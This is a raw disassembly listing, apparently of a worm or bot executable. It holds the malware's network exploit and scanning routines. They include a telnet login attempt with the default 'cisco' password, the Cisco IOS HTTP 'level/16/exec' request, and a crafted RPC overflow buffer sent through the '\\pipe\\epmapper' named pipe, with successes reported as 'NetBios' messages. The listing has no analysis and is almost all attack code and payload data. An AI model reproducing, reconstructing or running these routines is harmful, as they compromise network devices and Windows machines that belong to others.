loc_40BC35: ; CODE XREF: seg000:0040BC2E�j
mov ecx, [ebp-0Ch]
shl eax, 8
add eax, [ebp-4]
shl eax, 8
add eax, [ebp-8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+0Ch]
mov ds:dword_4D1FF0[ecx*8], eax
loc_40BC53: ; CODE XREF: seg000:0040BBE0�j
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC56 proc near ; CODE XREF: sub_41AA0A+2C�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ebp+var_4], edi
call ds:dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40BC7F
xor eax, eax
jmp short loc_40BCEE
; ---------------------------------------------------------------------------
loc_40BC7F: ; CODE XREF: sub_40BC56+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call ds:dword_444260 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call ds:dword_444094 ; ioctlsocket
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call ds:dword_4440AC ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push ebx
lea eax, [ebp+var_120]
push eax
push ebx
push ebx
mov [ebp+var_8], ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call ds:dword_4441B0 ; select
push esi
mov edi, eax
call ds:dword_444218 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_40BCEE: ; CODE XREF: sub_40BC56+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BC56 endp
; ---------------------------------------------------------------------------
db 55h
dd 8C246C8Dh, 28CEC81h, 458B0000h, 5756537Ch, 0F08B536Ah
dd 24BD8D59h, 0F3FFFFFFh, 48758BA5h, 14880C7h, 10000h
dd 458B0000h, 7075894Ch, 0FF7C4589h, 42B03815h, 0A1E85000h
dd 8B00012Fh, 0DB6959DEh, 234h, 199E9h, 647D8300h, 0F745000h
dd 0FF24858Dh, 0E850FFFFh, 0FFFFFE66h, 0E805EB59h, 0FFFFFE16h
dd 7C75FF59h, 0B3FFF88Bh, 4444ECh, 573875FFh, 418815FFh
dd 8D500044h, 0FFFDE885h, 2B2468FFh, 0E8500043h, 12922h
dd 0FDE8858Dh, 8D50FFFFh, 4442E883h, 0FE85000h, 0FF000129h
dd 75FF3C75h, 0B3E85738h, 83FFFFFEh, 0F8832CC4h, 20850F01h
dd 83000001h, 75FF547Dh, 3FF06875h, 15FF004Dh, 42B070h
dd 573875FFh, 418815FFh, 8D500044h, 0FFFDE885h, 2AFC68FFh
dd 0E8500043h, 128CAh, 8310C483h, 7500607Dh, 0B47D8027h
dd 0FF016A00h, 858D5C75h, 0FFFFFDE8h, 0B4458D50h, 858D0675h
dd 0FFFFFF34h, 3475FF50h, 0FF5432E8h, 14C483FFh, 0FDE8858Dh
dd 0E850FFFFh, 0BF58h, 0F02404C7h, 0FF004D3Fh, 42B06C15h
dd 0A5E900h, 0FF570000h, 44418815h, 858D5000h, 0FFFFFE6Ch
dd 2868E850h, 458B0001h, 6E0C154h, 43D85805h, 858D5000h
dd 0FFFFFEFCh, 2850E850h, 0C4830001h, 0B47D8010h, 0B4458D00h
dd 858D0675h, 0FFFFFF34h, 7C858D50h, 50FFFFFEh, 12831E8h
dd 34458B00h, 0FE688589h, 458BFFFFh, 1885895Ch, 8BFFFFFFh
dd 59596045h, 0FF1C8589h, 458BFFFFh, 0BCEC8138h, 89000000h
dd 0FFFF0885h, 54458BFFh, 89592F6Ah, 0FFFF0CB5h, 108589FFh
dd 8DFFFFFFh, 0FFFE68B5h, 0C1FC8BFFh, 0A5F306E0h, 0D88490FFh
dd 758B0043h, 0BCC48170h, 68000000h, 7D0h, 0B01415FFh
dd 838B0042h, 4444ECh, 0F4C53C83h, 4D1Fh, 0FE53850Fh, 0E856FFFFh
dd 0FFFFF255h, 0FF006A59h, 42B06815h
db 0, 0CCh
word_40BEFE dw 8D55h ; DATA XREF: sub_40274D+1D8F�o
; sub_40274D+5963�o
dd 818C246Ch, 1CCECh, 7C458B00h, 6A575653h, 0F08B5953h
dd 0BD8DDB33h, 0FFFFFF28h, 8943A5F3h, 14498h, 28858D00h
dd 50FFFFFFh, 417C15FFh, 4D8B0044h, 4CEC8148h, 89000001h
dd 1FF0CD04h, 536A004Dh, 28B58D59h, 8BFFFFFFh, 0E8A5F3FCh
dd 0FFFFF73Ch, 1AE80B6Ah, 81FFFFF1h, 150C4h, 75C33B00h
dd 3FF0BE6Ch, 0FF56004Dh, 42B07815h, 4006800h, 0FF568000h
dd 42B07415h, 75C08500h, 0A8858D50h, 68FFFFFEh, 432C08h
dd 2714E850h, 0DB330001h, 59645D39h, 531D7559h, 8D6075FFh
dd 0FFFEA885h, 858D50FFh, 0FFFFFF38h, 3875FF50h, 0FF5286E8h
dd 14C483FFh, 0FEA8858Dh, 0E850FFFFh, 0BDACh, 335E5F59h
dd 0C5835BC0h, 4C2C974h, 48458B00h, 0B014358Bh, 1C890042h
dd 4D1FF4C5h, 33FB8B00h, 547D83DBh, 0A4820F01h, 57000000h
dd 8D4875FFh, 0FFFF2885h, 3C75FFFFh, 50507D89h, 0FEA8858Dh
dd 0D468FFFFh, 5000432Bh, 12695E8h, 858D5300h, 0FFFFFEA8h
dd 0E8500B6Ah, 0FFFFEE65h, 89484D8Bh, 0C0694C45h, 234h
dd 5324C483h, 0EC888953h, 8D004444h, 0FFFF2885h, 0F36850FFh
dd 530040BCh, 3C15FF53h, 8B0042B0h, 0C9694C4Dh, 234h, 8189C33Bh
dd 4444FCh, 15FF4C75h, 42B01Ch, 0A8858D50h, 68FFFFFEh
dd 432B9Ch, 2630E850h, 858D0001h, 0FFFFFEA8h, 0BCEEE850h
dd 0C4830000h, 0FF1E6A10h, 7D3B47D6h, 5C860F54h, 39FFFFFFh
dd 2074445Dh, 6944458Bh, 0EA60C0h, 0D6FF5000h, 1E6A1FEBh
dd 5D39D6FFh, 0EBF77470h, 7D068D4h, 0D6FF0000h, 8348458Bh
dd 1FF4C53Ch, 7401004Dh, 4475FFECh, 0FF48458Bh, 48B3C75h
dd 4D1FF0C5h, 15FF5000h, 444188h, 0A8858D50h, 68FFFFFEh
dd 432B5Ch, 25B8E850h, 0C4830001h, 645D3914h, 0FF531D75h
dd 858D6075h, 0FFFFFEA8h, 38858D50h, 50FFFFFFh, 0E83875FFh
dd 0FFFF512Bh, 8D14C483h, 0FFFEA885h, 51E850FFh, 8B0000BCh
dd 1C894845h, 4D1FF4C5h, 2404C700h, 0BB8h, 0B6AD6FFh, 0FFEF3CE8h
dd 1F883FFh, 680B7559h, 4D3FF0h, 0B07815FFh, 75FF0042h
dd 0EFF7E848h, 5359FFFFh, 0B06815FFh
db 42h, 0, 0CCh
byte_40C15B db 55h ; DATA XREF: sub_40274D+2EC6�o
dd 8C246C8Dh, 3F0EC81h, 458B0000h, 5756537Ch, 8B594B6Ah
dd 40BD8DF0h, 0F3FFFFFFh, 2880C7A5h, 1000001h, 8D000000h
dd 0FFFF4085h, 15FF50FFh, 44417Ch, 3D39FF33h, 43D880h
dd 896C4589h, 7D89707Dh, 0F840F7Ch, 0BE000001h, 43D880h
dd 43D858BBh, 5875FF00h, 75FF36FFh, 0FA98E86Ch, 0C483FFFFh
dd 1F8830Ch, 0DB850Fh, 36FF0000h, 0FF40858Dh, 8D50FFFFh
dd 8D500A43h, 0FFFC8485h, 2C7068FFh, 0E8500043h, 124BEh
dd 6075FF57h, 0FC84858Dh, 8D50FFFFh, 0FFFF5085h, 75FF50FFh
dd 5039E850h, 858DFFFFh, 0FFFFFC84h, 0BB62E850h, 858D0000h
dd 0FFFFFF40h, 88858D50h, 50FFFFFEh, 12485E8h, 18858D00h
dd 53FFFFFFh, 2478E850h, 0C4830001h, 0D07D803Ch, 0D0458D00h
dd 858D0675h, 0FFFFFF50h, 98858D50h, 50FFFFFEh, 12459E8h
dd 50458B00h, 0FE848589h, 458BFFFFh, 34858960h, 8BFFFFFFh
dd 89596445h, 0FFFF3885h, 59068BFFh, 0FF248589h, 458BFFFFh
dd 0BCEC815Ch, 89000000h, 0FFFF2885h, 7C458BFFh, 89592F6Ah
dd 0FFFF2C85h, 84B58DFFh, 8BFFFFFEh, 0FFA5F3FCh, 0C4812C53h
dd 0BCh, 337045FFh, 7C45FFFFh, 8D40C383h, 3E392873h, 0FEFB850Fh
dd 75FFFFFFh, 40858D70h, 50FFFFFFh, 0FC84858Dh, 3C68FFFFh
dd 5000432Ch, 123D5E8h, 75FF5700h, 84858D60h, 50FFFFFCh
dd 0FF50858Dh, 0FF50FFFFh, 50E85075h, 8DFFFF4Fh, 0FFFC8485h
dd 79E850FFh, 0FF0000BAh, 4AE85C75h, 83FFFFEEh, 0FF572CC4h
dd 42B06815h, 8D55CC00h, 818C246Ch, 0BCECh, 7C458B00h
dd 2B6A5756h, 8DF08B59h, 0A5F3B87Dh, 6A46F633h, 0A8B08910h
dd 8D000000h, 6A6445h, 22B6E850h, 0C4830001h, 3C75FF0Ch
dd 6445C766h, 15FF0002h, 444260h, 8966066Ah, 458B6645h
dd 26A564Ch, 0FF684589h, 44410015h, 83F08B00h, 5974FFFEh
dd 458D106Ah, 0FF565064h, 4440AC15h, 484D8B00h, 234C969h
dd 0F8830000h, 0F4B189FFh, 74004444h, 3C75FF38h, 0FF4C75FFh
dd 44418815h, 0A0685000h, 0BF00432Ch, 4D49B0h, 2300E857h
dd 6A0001h, 8D5475FFh, 5057BC45h, 0E8B875FFh, 0FFFF4E83h
dd 0B9B2E857h, 0C4830000h, 15FF5628h, 444218h, 5EC0335Fh
dd 0C974C583h
db 0C2h, 4, 0
byte_40C3D3 db 55h ; DATA XREF: sub_40274D+5D4B�o
dd 8C246C8Dh, 134EC81h, 8B530000h, 57567C5Dh, 8B592B6Ah
dd 0C07D8DF3h, 358BA5F3h, 42B014h, 0A483C7h, 10000h, 0FF330000h
dd 0FF4475FFh, 15FF5475h, 444188h, 40858D50h, 68FFFFFFh
dd 432CC8h, 2288E850h, 0FF680001h, 8D000001h, 0FFFF4085h
dd 458B50FFh, 34C06950h, 5000002h, 4442E8h, 2422E850h
dd 0C4830001h, 6C458D1Ch, 458D5750h, 0A6850C0h, 570040C3h
dd 3C15FF57h, 3B0042B0h, 704589C7h, 4EB0B74h, 0D6FF326Ah
dd 74687D39h, 7075FFF7h, 0B00415FFh, 0B3FF0042h, 8Ch, 0A8BB89h
dd 0D6FF0000h, 458D046Ah, 458D5054h, 71E8507Ch, 8300012Fh
dd 75FF0CC4h, 0DC15FF7Ch, 40004441h, 7C458950h, 423415FFh
dd 45890044h, 8D046A7Ch, 8D507C45h, 0E8505445h, 12F48h
dd 0E90CC483h, 0FFFFFF40h
dword_40C4C0 dd 246C8D55h, 30EC818Ch, 53000001h, 567C5D8Bh, 592B6A57h
; DATA XREF: sub_40274D+5A65�o
dd 7D8DF38Bh, 8BA5F3C4h, 42B01435h, 0A483C700h, 1000000h
dd 33000000h, 4875FFFFh, 0FF5875FFh, 44418815h, 858D5000h
dd 0FFFFFF44h, 432D1C68h, 9BE85000h, 68000121h, 1FFh, 0FF44858Dh
dd 8B50FFFFh, 0C0695445h, 234h, 4442E805h, 35E85000h, 83000123h
dd 458D1CC4h, 8D575070h, 6850C445h, 40C30Ah, 15FF5757h
dd 42B03Ch, 4589C73Bh, 0EB0B747Ch, 0FF326A04h, 6C7D39D6h
dd 75FFF774h, 415FF7Ch, 0FF0042B0h, 8CB3h, 0A8BB8900h
dd 0FF000000h, 48458BD6h, 744C453Bh, 4845FF08h, 0FFFF70E9h
dd 5875FFFFh, 418815FFh, 8D500044h, 0FFFF4485h, 2CF068FFh
dd 0E8500043h, 1210Eh, 6075FF57h, 0FF44858Dh, 8D50FFFFh
dd 0FF50C845h, 8CE8C475h, 0FFFFFF4Ch, 92E85475h, 83FFFFEBh
dd 5E5F24C4h, 835BC033h, 0C2C974C5h
db 4, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 290h
push esi
push edi
xor esi, esi
push esi
push 1
push 2
call ds:dword_444100 ; socket
mov edi, eax
cmp edi, esi
jl loc_40C72B
push 10h
lea eax, [ebp-10h]
push esi
push eax
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-10h], 2
call ds:dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-0Ch], eax
call ds:dword_444260 ; htons
mov [ebp-0Eh], ax
push 10h
lea eax, [ebp-10h]
push eax
push edi
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40C72B
push 40h
lea eax, [ebp-50h]
push esi
push eax
call sub_41E5F0
push 40h
lea eax, [ebp-90h]
push esi
push eax
call sub_41E5F0
add esp, 18h
push esi
push 40h
lea eax, [ebp-50h]
push eax
push edi
call ds:dword_444064 ; recv
test eax, eax
jle loc_40C72B
push esi
push 40h
lea eax, [ebp-50h]
push eax
push edi
call ds:dword_444064 ; recv
push esi
push 6
push offset aCisco ; "cisco\r"
push edi
call ds:dword_4441A0 ; send
push esi
push 40h
lea eax, [ebp-90h]
push eax
push edi
call ds:dword_444064 ; recv
push 6
lea eax, [ebp-90h]
push offset aPass ; "\r\nPass"
push eax
call sub_41F780
add esp, 0Ch
test eax, eax
jz short loc_40C72B
push 28h
lea eax, [ebp-50h]
push offset aUserAccessVeri ; "\r\n\r\nUser Access Verification\r\n\r\nPasswor"...
push eax
call sub_41F780
add esp, 0Ch
test eax, eax
jnz short loc_40C72B
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, offset aNetbios ; "NetBios"
push eax
push offset unk_432D48
lea eax, [ebp-290h]
push 200h
push eax
call sub_41E6FE
push esi
push dword ptr [ebp+0B8h]
lea eax, [ebp-290h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_40123B
lea eax, [ebp-290h]
push eax
call sub_417D70
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
add esp, 2Ch
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_40C72D
; ---------------------------------------------------------------------------
loc_40C72B: ; CODE XREF: seg000:0040C5E2�j
; seg000:0040C62A�j ...
xor eax, eax
loc_40C72D: ; CODE XREF: seg000:0040C729�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1210h
call sub_41EA20
push ebx
push esi
push edi
xor ebx, ebx
push ebx
push 1
push 2
call ds:dword_444100 ; socket
mov edi, eax
cmp edi, ebx
jl loc_40C894
push 10h
lea eax, [ebp-10h]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-10h], 2
call ds:dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-0Ch], eax
call ds:dword_444260 ; htons
mov [ebp-0Eh], ax
push 10h
lea eax, [ebp-10h]
push eax
push edi
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40C894
push ebx
mov esi, offset aGetLevel16Exec ; "GET /level/16/exec/-///pwd HTTP/1.0\n\n"
push esi
call sub_41E1C0
pop ecx
push eax
push esi
push edi
call ds:dword_4441A0 ; send
test eax, eax
jl loc_40C894
mov esi, 1000h
push esi
lea eax, [ebp-1210h]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push ebx
push esi
lea eax, [ebp-1210h]
push eax
push edi
call ds:dword_444064 ; recv
mov esi, eax
cmp esi, ebx
jl loc_40C894
push edi
call ds:dword_444218 ; closesocket
cmp esi, 5
jl loc_40C894
lea eax, [ebp-1210h]
push offset aHttp1_0200Ok ; "HTTP/1.0 200 OK"
push eax
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40C894
lea eax, [ebp-1210h]
push offset aCisco_0 ; "cisco"
push eax
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz short loc_40C894
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, offset aNetbios ; "NetBios"
push eax
push offset unk_432DAC
lea eax, [ebp-210h]
push 200h
push eax
call sub_41E6FE
push ebx
push dword ptr [ebp+0B8h]
lea eax, [ebp-210h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_40123B
lea eax, [ebp-210h]
push eax
call sub_417D70
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
add esp, 2Ch
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_40C896
; ---------------------------------------------------------------------------
loc_40C894: ; CODE XREF: seg000:0040C752�j
; seg000:0040C79A�j ...
xor eax, eax
loc_40C896: ; CODE XREF: seg000:0040C892�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C89B proc near ; CODE XREF: seg000:0040CC6F�p
; seg000:004105B1�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset off_432E14
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_432E0C ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
mov ecx, 8Ah
lea edi, [ebp+var_34E]
rep stosd
push 45h
stosw
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+var_124], bl
lea edi, [ebp+var_123]
rep stosd
stosw
push 0FFh
stosb
lea eax, [ebp+var_124]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push ebx
push ebx
call ds:dword_42B07C ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_41F838
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_41F838
mov esi, [ebp+arg_4]
add esp, 10h
lea eax, [ebp+var_354]
push ebx
mov [esi+14h], eax
mov eax, offset dword_432E08
push eax
push eax
push esi
mov [esi+4], ebx
mov [esi+10h], ebx
mov [esi+1Ch], ebx
call ds:dword_444240
cmp eax, 5
mov edi, 4C3h
jz short loc_40C95A
cmp eax, edi
jnz short loc_40C964
loc_40C95A: ; CODE XREF: sub_40C89B+B9�j
push ebx
push ebx
push ebx
push esi
call ds:dword_444240
loc_40C964: ; CODE XREF: sub_40C89B+BD�j
cmp eax, 5
jz short loc_40C972
cmp eax, edi
jz short loc_40C972
xor eax, eax
inc eax
jmp short loc_40C974
; ---------------------------------------------------------------------------
loc_40C972: ; CODE XREF: sub_40C89B+CC�j
; sub_40C89B+D0�j
xor eax, eax
loc_40C974: ; CODE XREF: sub_40C89B+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C89B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C979 proc near ; CODE XREF: seg000:0040CCC1�p
; seg000:0040CDA1�p ...
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset off_432E14
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_432E0C ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
mov ecx, 8Ah
lea edi, [ebp+var_34E]
rep stosd
push 45h
stosw
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+var_124], bl
lea edi, [ebp+var_123]
rep stosd
stosw
push 0FFh
stosb
lea eax, [ebp+var_124]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push ebx
push ebx
call ds:dword_42B07C ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_41F838
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_41F838
add esp, 10h
jmp short loc_40CA13
; ---------------------------------------------------------------------------
loc_40CA08: ; CODE XREF: sub_40C979+AB�j
push 7D0h
call ds:dword_42B014 ; Sleep
loc_40CA13: ; CODE XREF: sub_40C979+8D�j
push ebx
lea eax, [ebp+var_354]
push ebx
push eax
call ds:dword_444090
test eax, eax
jnz short loc_40CA08
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_40C979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA2C proc near ; CODE XREF: seg000:0040CCED�p
; seg000:0040CE2E�p
var_2000 = byte ptr -2000h
var_1FDC = byte ptr -1FDCh
var_1FD0 = byte ptr -1FD0h
var_1F29 = byte ptr -1F29h
var_1000 = byte ptr -1000h
var_FF8 = dword ptr -0FF8h
var_FF0 = dword ptr -0FF0h
var_F80 = dword ptr -0F80h
var_F7C = dword ptr -0F7Ch
var_F4C = dword ptr -0F4Ch
var_F48 = dword ptr -0F48h
var_F30 = dword ptr -0F30h
var_E74 = dword ptr -0E74h
var_CA0 = dword ptr -0CA0h
var_C98 = dword ptr -0C98h
var_C90 = byte ptr -0C90h
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 2000h
call sub_41EA20
push ebx
push esi
push edi
push 30h
lea eax, [ebp+var_2000]
push offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push eax
mov edi, 0A7h
call sub_41F400
push edi
lea eax, [ebp+var_1FD0]
push 0FFFFFF90h
push eax
call sub_41E5F0
push 159h
mov ebx, offset dword_43E628
lea eax, [ebp+var_1F29]
push ebx
push eax
call sub_41F400
add esp, 24h
loc_40CA7D: ; CODE XREF: sub_40CA2C+9B�j
push 30h
lea eax, [ebp+var_2000]
push offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push eax
inc edi
call sub_41F400
push edi
lea eax, [ebp+var_1FD0]
push 0FFFFFF90h
push eax
call sub_41E5F0
push 159h
lea eax, [ebp+edi+var_1FD0]
push ebx
push eax
call sub_41F400
add esp, 24h
lea esi, [edi+189h]
mov eax, esi
push 10h
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_40CA7D
cmp [ebp+arg_C4], 0
jz short loc_40CAE4
cmp [ebp+arg_C0], 3
jz short loc_40CAED
cmp [ebp+arg_C0], 0
jmp short loc_40CAEB
; ---------------------------------------------------------------------------
loc_40CAE4: ; CODE XREF: sub_40CA2C+A4�j
cmp [ebp+arg_C0], 3
loc_40CAEB: ; CODE XREF: sub_40CA2C+B6�j
jnz short loc_40CAF6
loc_40CAED: ; CODE XREF: sub_40CA2C+AD�j
push 4
push offset dword_43E624
jmp short loc_40CAFD
; ---------------------------------------------------------------------------
loc_40CAF6: ; CODE XREF: sub_40CA2C:loc_40CAEB�j
push 4
push offset dword_43E620
loc_40CAFD: ; CODE XREF: sub_40CA2C+C8�j
lea eax, [ebp+var_1FDC]
push eax
call sub_41F400
add esp, 0Ch
push 360h
lea eax, [ebp+var_1000]
push offset dword_43E158
push eax
call sub_41F400
push 10h
lea eax, [ebp+var_CA0]
push offset dword_43E4BC
push eax
call sub_41F400
push esi
lea eax, [ebp+var_2000]
push eax
lea eax, [ebp+var_C90]
push eax
call sub_41F400
push 3Ch
lea edi, [esi+370h]
lea eax, [ebp+edi+var_1000]
push offset off_43E4D0
push eax
call sub_41F400
push 30h
add edi, 3Ch
lea eax, [ebp+edi+var_1000]
push offset dword_43E510
push eax
call sub_41F400
mov eax, esi
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA0], eax
add [ebp+var_C98], eax
mov eax, [ebp+var_FF8]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF8], eax
mov eax, [ebp+var_FF0]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF0], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F7C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F7C], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F48]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F48], eax
mov eax, [ebp+var_F30]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F30], eax
mov eax, [ebp+var_E74]
lea eax, [eax+esi-0Ch]
add edi, 30h
lea esi, [edi+1]
push esi
mov [ebp+var_E74], eax
call sub_41E5D3
add esp, 40h
push esi
mov ebx, eax
push 0
push ebx
call sub_41E5F0
push edi
lea eax, [ebp+var_1000]
push eax
push ebx
call sub_41F400
mov eax, [ebp+arg_BC]
mov [eax], edi
add esp, 18h
mov eax, ebx
pop edi
pop esi
pop ebx
leave
retn
sub_40CA2C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1138h
call sub_41EA20
cmp dword ptr [ebp+0A8h], 1BDh
push ebx
push esi
push edi
jnz loc_40CDB5
lea eax, [ebp-34h]
push eax
lea eax, [ebp+0Ch]
push eax
call sub_40C89B
test eax, eax
pop ecx
pop ecx
jz loc_40CEC5
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-138h]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call sub_41E6A6
add esp, 0Ch
xor ebx, ebx
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
lea eax, [ebp-138h]
push eax
call ds:dword_42B08C ; CreateFileA
mov [ebp-4], eax
cmp eax, 0FFFFFFFFh
lea eax, [ebp+0Ch]
jnz short loc_40CCCC
loc_40CCC0: ; CODE XREF: seg000:0040CD6D�j
push eax
call sub_40C979
pop ecx
jmp loc_40CEC5
; ---------------------------------------------------------------------------
loc_40CCCC: ; CODE XREF: seg000:0040CCBE�j
push 2
push eax
call sub_41AA0A
pop ecx
pop ecx
push 1
push eax
lea eax, [ebp-10h]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40CA2C
add esp, 0C8h
cmp eax, ebx
mov [ebp-8], eax
jz short loc_40CD61
mov edi, 186A0h
push edi
call sub_41E5D3
push edi
mov esi, eax
push ebx
push esi
call sub_41E5F0
add esp, 10h
push ebx
lea eax, [ebp-0Ch]
push eax
mov edi, 2710h
push edi
push esi
push 48h
push offset dword_43E108
push dword ptr [ebp-4]
call ds:dword_42B088 ; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_40CD51
push ebx
lea eax, [ebp-14h]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-8]
push dword ptr [ebp-4]
call ds:dword_42B084 ; WriteFile
test eax, eax
jnz short loc_40CD72
loc_40CD51: ; CODE XREF: seg000:0040CD37�j
push esi
call sub_41E2A1
push dword ptr [ebp-8]
call sub_41E2A1
pop ecx
pop ecx
loc_40CD61: ; CODE XREF: seg000:0040CCFD�j
push dword ptr [ebp-4]
call ds:dword_42B004 ; CloseHandle
lea eax, [ebp+0Ch]
jmp loc_40CCC0
; ---------------------------------------------------------------------------
loc_40CD72: ; CODE XREF: seg000:0040CD4F�j
push ebx
lea eax, [ebp-0Ch]
push eax
push edi
push esi
push dword ptr [ebp-4]
call ds:dword_42B080 ; ReadFile
push dword ptr [ebp-8]
mov edi, eax
call sub_41E2A1
push esi
call sub_41E2A1
pop ecx
pop ecx
push dword ptr [ebp-4]
call ds:dword_42B004 ; CloseHandle
lea eax, [ebp+0Ch]
push eax
call sub_40C979
cmp edi, 1
pop ecx
jnz loc_40CED6
jmp loc_40CEC5
; ---------------------------------------------------------------------------
loc_40CDB5: ; CODE XREF: seg000:0040CC61�j
lea eax, [ebp+0Ch]
push 1
push eax
call sub_41AA0A
mov esi, eax
cmp esi, 1
pop ecx
pop ecx
jz loc_40CEC5
xor ebx, ebx
push ebx
push 1
push 2
call ds:dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_40CEC5
push 10h
lea eax, [ebp-24h]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push dword ptr [ebp+0A8h]
mov word ptr [ebp-24h], 2
call ds:dword_444260 ; htons
mov [ebp-22h], ax
lea eax, [ebp+0Ch]
push eax
call ds:dword_44417C ; inet_addr
push ebx
push esi
mov [ebp-20h], eax
lea eax, [ebp-0Ch]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40CA2C
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp-8], esi
jnz short loc_40CE47
push dword ptr [ebp-4]
jmp short loc_40CEBF
; ---------------------------------------------------------------------------
loc_40CE47: ; CODE XREF: seg000:0040CE40�j
mov edi, [ebp-4]
push 10h
lea eax, [ebp-24h]
push eax
push edi
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40CE5F
loc_40CE5C: ; CODE XREF: seg000:0040CE71�j
push esi
jmp short loc_40CEB8
; ---------------------------------------------------------------------------
